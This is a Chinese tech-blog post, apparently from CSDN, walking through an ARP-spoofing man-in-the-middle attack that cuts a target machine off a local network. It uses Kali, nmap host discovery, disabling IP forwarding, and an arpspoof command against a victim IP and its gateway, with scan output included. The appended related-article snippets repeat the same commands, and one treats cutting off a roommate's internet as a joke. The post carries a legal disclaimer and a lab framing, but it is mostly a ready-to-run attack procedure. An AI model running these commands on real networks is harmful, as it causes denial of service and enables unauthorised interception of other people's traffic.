【网络安全】MITM攻击:局域网内设备断网

于 2024-09-17 11:59:17 发布
阅读量399 收藏 4
点赞数 1
分类专栏: 网络 文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75196987/article/details/142312961
版权

0.前言

本文仅供交流学习,请遵守《网络安全法》,并承诺:

1、未经允许,不得进入计算机信息网络或者使用计算机信息网络资源;

 2、未经允许,不得对计算机信息网络功能进行删除、修改或者增加;

  3、未经允许,不得对计算机信息网络中存储或者传输的数据和应用程序进行删除、修改或者增加;

  4、不得故意制作、传播计算机病毒以及其它破坏性程序;

  5、不盗用别人计算机的ip地址、网卡物理地址(mac值)和信息数据;6、不做其它危害计算机信息网络安全行为。

1.原理

Arp欺骗(中间人攻击):攻击时Kali复制路由器MAC地址,假冒路由器截取靶机数据。同理伪装客户端欺骗路由器。

2.过程

靶机:Ubuntu

攻击者:Kali

首先,使用nmap扫描目标网段,查看靶机ip地址。

nmap 192.168.110.1-255 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-09-17 11:46 CST
Nmap scan report for 192.168.110.2 (192.168.110.2)
Host is up (0.0039s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.00090s latency).
All 1000 scanned ports on 192.168.110.129 (192.168.110.129) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.110.130 (192.168.110.130)
Host is up (0.0075s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp

Nmap done: 255 IP addresses (3 hosts up) scanned in 4.17 seconds

网段:同一网段指的是IP地址和子网掩码相与得到相同的网络地址。想在同一网段,必需做到网络标识相同。

获得目标的ip地址: 192.168.110.2和192.168.110.130(129为kali)。

接着阻止路由器和客户机相互转发包裹。

echo 0 > /proc/sys/net/ipv4/ip_forward

最后即可进行攻击,两者间通信会经过kali机。

arpspoof -i eth0 -t 192.168.110.130 -r 192.168.110.2

-i 为指定网卡

-t指定打击(欺骗)设备的IP
-r 指定打击路由的IP
ctrl_c 停止攻击

 4.查验成果

虚拟机Ubuntu无法上网, 退出arp指令行后网络恢复。

Hermitthee
关注
专栏目录
网络设备安全配置与局域网攻击典型案例汇总
悦分享
07-15 2544
网络设备配置不正确时,很容易利用LAN漏洞。依赖易于部署的设备是很重要的,但为了支持即时功能,不能忽略它们的安全设置。链接层部分是本章关于漏洞和安全问题的最广泛部分。链路层攻击利用低级漏洞,并允许攻击者利用此级别的弱点,为执行更高级的攻击提供基础。这就是链路层保护至关重要的原因,了解默认设置如何危害协议堆栈中的这一重要层也是至关重要的。例如,基于ARP协议的攻击可以毒害设备的ARP表,使其相信伪造的MAC/IP地址通信,从而执行MITM攻击并随后窃取机密信息。VLAN等功能欺骗和洪泛攻击。https。..
局域网断网攻击
05-18
局域网断网攻击小计
局域网断网攻击 (ARP攻击)
qq_38611079的博客
09-08 4472
攻击原理:ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。   获取局域网中的IP地址(以本机地址为实验):命令行执行ipconfig      获取的IP为192.168.1.xxx 网关为:192.168.1.1 ...
安全相关-系统安全-arp断网攻击工具(arpspoof) v1.0.zip
09-15
在IT行业中,网络安全性是至关重要的一个领域,尤其是在我们日常使用的局域网环境中。"arp断网攻击工具(arpspoof)"是这类攻击的一个典型代表,它涉及到的是ARP(Address Resolution Protocol,地址解析协议)欺骗...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 005-网络安全应急技术与实践(黑客入侵技术)
时光隧道
02-06 7万+
WHOIS查询是一种用于确定域名或IP地址的所有者和注册信息的公共数据库查询服务。使用WHOIS查询,您可以查找域名的注册商、注册日期、到期日期、域名所有者的联系信息以及域名服务器等相关信息。WHOIS协议通常使用TCP端口43进行通信。请注意,由于WHOIS是公开数据库,因此某些敏感信息(例如个人联系信息)可能会被隐藏或保护,以保护个人隐私。
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 010-网络安全应急技术与实践(网络层-无线ARP欺骗与消息监听重现分析)
热门推荐
时光隧道
02-08 7万+
无线ARP欺骗(Wireless ARP Spoofing)是一种网络攻击方式,它利用ARP(地址解析协议)中的漏洞,欺骗通信双方,使其将通信数据发送给攻击者,从而实现中间人攻击。消息监听(Message Eavesdropping)则是指攻击者截获并监听通信双方之间的通信数据。以下是无线ARP欺骗与消息监听的重现分析过程:攻击者在同一局域网中启动无线ARP欺骗工具,如Ettercap、ARPwner等。攻击者扫描附近的无线网络,获取目标网络的SSID(无线网络名称)和MAC地址。
kali下Bettercap:用于嗅探流量和密码的MITM攻击
我的学习笔记
02-28 5163
参考文章:click here部署环境,获得最新版的Bettercapapt-get update apt-get dist-upgrade apt-get install bettercap 环境展示:uname -aLinux kali 4.7.0-kali1-amd64 #1 SMP Debian 4.7.6-1kali1 (2016-10-17)...
局域网指定ip断网工具源码(貌似arp防火墙拦不住)
07-25
http://blog.csdn.net/xiaoxiao108/article/details/5789226 只适用于小型局域网 开发环境 windowsxp vs2005 1. 局域网环境如下 192.168.1.104(00-0b-2f-43-93-7f) 192.168.1.109(00-18-DE-C5-FD-6F) 192.168.1.1(00-27-19-a3-3f-12) 2.由于 192.168.1.104 天天用直播软件,或者一天到晚的迅雷下个不停,使得192.168.1.109 使用电脑时感觉网速很卡 。 3.这时192.168.1.109 可以给路由器发arp数据包,这个地方很重要 ,不是给192.168.1.104发数据包而是给路由器发, 告诉路由器 192.168.1.104 的mac地址时(11-11-11-11-11-11) 反正一个伪造的就行 4.这时 路由器跟 192.168.1.104的通信中断 ,192.168.1.104 断网 原理很简单。。。。。。。。。。自己看代码吧 如果你发现有什么不合理的,需要改进的地方,联系328452421@qq.com 朱晓 (泰山学院)。相互交流 谢谢 http://blog.csdn.net/xiaoxiao108/article/details/5789226
局域网断网攻击(arp攻击
qq_41453632的博客
10-30 3271
什么是arp断网攻击     简单来说就是就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。再简单的说,只要对局域网下任一台主机进行arp攻击,那么就可以导致这台主机断网 需要的工具 kali  linux arpspoof  (k...
局域网内的ARP断网攻击
CZD__CZD的博客
03-30 7767
局域网内的ARP断网攻击,室友不听话,直接断他网,嘻嘻嘻嘻嘻嘻
局域网断网攻击讲解
journeyIT的博客
01-10 418
局域网断网攻击讲解 Arpspoof  -i 网卡 -t 目标IP 网关     Kali : 网卡eth0 目标ip :192.168.1.100 网关:192.168.1.1     替换掉: arpspoof -i eth0 -t 192.168.100 192.168.1.1   怎么看局域网当中的ip呢   Fping -asg 192....
ARP局域网断网攻击
afei001
03-06 1550
ARP简介     ARP(Address Resolution Protocol)地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。位于网络层。 ARP工作原理 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址。 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约...
渗透测试之局域网断网攻击
追风筝的孩子
07-30 1万+
      关于局域网断网攻击,顾名思义,就是对局域网内某个IP或全部IP进行攻击,让局域网内某个IP或全部IP断网,这是不是很有趣。      原理:关于arp断网攻击是基于arp协议的缺陷,这其实是arp欺骗的时候配置错误引起的现象。就是以我的网卡代替网关。因为目标要上网的数据包需要经过网关,但现在我欺骗了目标主机,让它误认为我的网卡是网关,当数据包经过我的网卡的时候全部丢弃,这就造成了断网...
利用kali在同一个局域网内进行 ARP断网攻击
最新发布
anluo233的博客
05-22 1316
ARP的主要功能是通过已知的IP地址获取对应的MAC地址。这在局域网通信中是必不可少的,因为以太网帧的发送需要目的设备的MAC地址。
内网渗透之断网攻击实验和防御
qq_46258964的博客
06-14 1013
ARP断网攻击: 伪造IP地址和Mac地址实现ARP欺骗 导致网络堵塞, 攻击工具: kali一台 arpspoof 攻击步骤 1,扫描局域网生存主机 nmap -sP 192.168.31.1/24 2,进行ARP攻击 arpspoof -i eth0 -t 192.168.31.175 192.168.31.1 -i ------------指定网卡名 -t ------------指定IP地址和网关 3.对方不能上网,按Ctrl+c停止攻击 防御: 1.360里面添加下载流量防火墙,自动拦截并
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值